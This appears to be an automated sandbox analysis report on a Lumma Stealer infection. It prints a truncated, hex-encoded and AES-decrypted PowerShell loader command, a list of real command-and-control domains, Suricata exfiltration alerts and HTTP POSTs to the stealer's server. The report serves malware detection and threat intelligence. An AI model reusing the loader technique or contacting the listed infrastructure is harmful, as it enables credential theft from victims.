koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A74596

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A74596

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T17:11:14.941168+0100	2028371	3	Unknown Traffic	192.168.2.4	49849	188.114.96.3	443	TCP
2025-01-01T17:11:15.918952+0100	2028371	3	Unknown Traffic	192.168.2.4	49855	188.114.96.3	443	TCP
2025-01-01T17:11:17.055447+0100	2028371	3	Unknown Traffic	192.168.2.4	49865	188.114.96.3	443	TCP
2025-01-01T17:11:18.138884+0100	2028371	3	Unknown Traffic	192.168.2.4	49871	188.114.96.3	443	TCP
2025-01-01T17:11:19.224758+0100	2028371	3	Unknown Traffic	192.168.2.4	49881	188.114.96.3	443	TCP
2025-01-01T17:11:20.475520+0100	2028371	3	Unknown Traffic	192.168.2.4	49888	188.114.96.3	443	TCP
2025-01-01T17:11:21.780893+0100	2028371	3	Unknown Traffic	192.168.2.4	49899	188.114.96.3	443	TCP
2025-01-01T17:11:24.796765+0100	2028371	3	Unknown Traffic	192.168.2.4	49918	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T17:11:15.451455+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49849	188.114.96.3	443	TCP
2025-01-01T17:11:16.388302+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49855	188.114.96.3	443	TCP
2025-01-01T17:11:25.246850+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49918	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T17:11:15.451455+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49849	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T17:11:16.388302+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49855	188.114.96.3	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T17:11:17.658072+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49865	188.114.96.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://noisercluch.click/api=	Avira URL Cloud: Label: malware
Source: https://noisercluch.click/	Avira URL Cloud: Label: malware
Source: https://noisercluch.click/api8)	Avira URL Cloud: Label: malware
Source: https://noisercluch.click/api	Avira URL Cloud: Label: malware
Source: noisercluch.click	Avira URL Cloud: Label: malware

Found malware configuration

Source: 9.2.powershell.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["noisercluch.click", "screwamusresz.buzz", "hummskitnj.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "inherineau.buzz", "appliacnesot.buzz"], "Build id": "WG6I6S--web44"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 93.7% probability

Sample uses string decryption to hide its real strings

Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: noisercluch.click
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: WG6I6S--web44

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 9_2_00415640 CryptUnprotectData,

9_2_00415640

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49881 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49918 version: TLS 1.2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06BE6839h	4_2_06BE67D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06BE6839h	4_2_06BE67C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp 06BE6839h	4_2_06BE69C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+795224B5h]	9_2_00426230
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_004192C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+418B67A0h]	9_2_0040D35C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	9_2_0043C59C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	9_2_0043EEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	9_2_0043EEC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	9_2_0042BF45
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+273D8908h]	9_2_0043F040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	9_2_0043F040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [esi], cl	9_2_0042B078
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	9_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	9_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	9_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	9_2_0043A800
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	9_2_0043B813
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], AD68FE34h	9_2_0043E8D0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push esi	9_2_004210F3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, eax	9_2_00418095
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	9_2_0042C894
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	9_2_004290B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-23ABFE5Bh]	9_2_004290B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp edx	9_2_0043D140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	9_2_0041D172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	9_2_0042C9DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	9_2_0042C9E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-6E7BF537h]	9_2_0042C984
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	9_2_0041D189
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+795224EFh]	9_2_004259B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [edx], cx	9_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov eax, ecx	9_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebp, dword ptr [esp+20h]	9_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	9_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	9_2_00414A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, edx	9_2_0041720B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+65F916CFh]	9_2_0041720B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then and esi, 80000000h	9_2_00408A20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-15B7625Fh]	9_2_00428290
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+273D8904h]	9_2_0043DAA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 9164D103h	9_2_0043DBB0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	9_2_00407440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	9_2_00407440
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp word ptr [edi+eax], 0000h	9_2_0041CC60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	9_2_0043B46A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov dword ptr [ebp-00000248h], E7E6E5E6h	9_2_0043BC14
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ecx, eax	9_2_0043BC14
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov esi, eax	9_2_00416D52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edi, ecx	9_2_0041D560
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebp]	9_2_00437D00
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov word ptr [ebx], cx	9_2_0041AD81
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	9_2_00429DA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, ecx	9_2_0040EDB4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, eax	9_2_0040EDB4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edi, dword ptr [esp+54h]	9_2_00428640
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov edx, eax	9_2_0043BCDB
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	9_2_004146C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then mov byte ptr [ecx], al	9_2_004266C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then jmp edx	9_2_004226D3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then cmp dword ptr [esi+ebx*8], 4B1BF3DAh	9_2_00437790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4x nop then push dword ptr [esp+04h]	9_2_00437790

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49855 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49865 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49855 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49849 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49849 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49918 -> 188.114.96.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: noisercluch.click
Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz

Source: global traffic

HTTP traffic detected: GET /web.png HTTP/1.1Host: cc.klipjaqemiu.shopConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49849 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49855 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49865 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49871 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49881 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49888 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49899 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49918 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QCN9PQE8F9B0U7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18139Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8YGJKPGFYZMNNECUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8766Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=D2TMTQXTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20377Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=1P92F68DOIFXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1191Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y28BDORXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568376Host: noisercluch.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: noisercluch.click

